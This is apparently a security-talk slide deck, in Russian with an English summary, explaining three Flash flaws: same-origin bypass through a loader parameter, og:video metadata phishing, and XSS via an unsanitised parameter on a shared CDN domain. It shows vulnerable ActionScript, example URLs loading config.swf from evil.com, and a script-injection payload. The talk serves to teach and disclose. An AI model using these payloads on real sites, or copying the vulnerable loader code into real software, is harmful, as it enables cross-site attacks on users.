This document summarizes three security vulnerabilities that can exist in Flash applications: 1. Same-origin policy bypass through loader contexts and cross-domain policies 2. Phishing through manipulation of SWF URLs in metadata 3. Cross-site scripting through user-supplied parameters if the SWF is loaded from a public CDN domain that is shared by other sites.

1. Flash умер.
Да здравствует Flash!
Александра Сватикова
Одноклассники

2. Модель безопасности Flash
• Application sandbox
• Security domain /
application domain

3. #1 Same-Origin Policy bypass
http://st.mycdn.me/vulnerable.swf?conf=config.swf
Jakub Żoczek (@zoczus)
loader.load(new URLRequest(loaderInfo.parameters.conf),
new LoaderContext(false,
new ApplicationDomain(),
SecurityDomain.currentDomain));
!
addChild(loader);

4. #1 Same-Origin Policy bypass
http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swf
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf
loader.load(new URLRequest(loaderInfo.parameters.conf),
new LoaderContext(false,
new ApplicationDomain(),
SecurityDomain.currentDomain));
!
addChild(loader);

5. #1 Same-Origin Policy bypass
evil.com mycdn.me
Jakub Żoczek (@zoczus)
http://st.mycdn.me/vulnerable.swf?conf=config.swf
loader.load(new URLRequest(loaderInfo.parameters.conf),
new LoaderContext(false,
new ApplicationDomain(),
SecurityDomain.currentDomain));
!
addChild(loader);

6. #1 Same-Origin Policy bypass
Jakub Żoczek (@zoczus)
http://ok.ru/crossdomain.xml
<cross-domain-policy>
...
<allow-access-from domain="st.mycdn.me"/>
<allow-access-from domain="ok.ru"/>
<allow-access-from domain="*.ok.ru"/>
...
</cross-domain-policy>

7. #1 Same-Origin Policy bypass
Jakub Żoczek (@zoczus)
http://ok.ru/crossdomain.xml
evil.com ok.ru
<cross-domain-policy>
...
<allow-access-from domain="st.mycdn.me"/>
<allow-access-from domain="ok.ru"/>
<allow-access-from domain="*.ok.ru"/>
...
</cross-domain-policy>

9. #2 Phishing
…
<meta
property=“og:video"
content=“http://tv.ru/player.swf?conf=http://tv.ru/config.swf”
>
…

10. #2 Phishing
<meta
property=“og:video"
content=“http://tv.ru/player.swf?conf=http://tv.ru/config.swf”
>
<meta
property=“og:video"
content=“http://tv.ru/player.swf?
conf=http://tv.ru.evil.com/config.swf”
>

11. #2 Phishing
<meta
property=“og:video"
content=“http://tv.ru/player.swf?
conf=http://tv.ru.evil.com/config.swf”
>

12. #3 XSS in CDN domain
http://st.mycdn.me/vulnerable.swf?param=username
_root.createTextField("Inputbox",0,20,20,320,240);
_root.Inputbox.html=true;
_root.Inputbox.htmlText=“Welcome " + _root.param;
http://st.mycdn.me/vulnerable.swf?param=<script>alert(‘xss’)</script>

13. #3 XSS in CDN domain
$ host st.mycdn.me
st.mycdn.me has address 217.20.152.226
$
$ host videoplayer.ok.ru
videoplayer.ok.ru is an alias for st.mycdn.me.
videoplayer.ok.ru has address 217.20.152.226

14. #3 XSS in CDN domain
$ host st.mycdn.me
st.mycdn.me has address 217.20.152.226
$
$ host videoplayer.ok.ru
videoplayer.ok.ru is an alias for st.mycdn.me.
videoplayer.ok.ru has address 217.20.152.226
http://videoplayer.ok.ru/vulnerable.swf?param=alert(‘xss’)

15. Спасибо за внимание!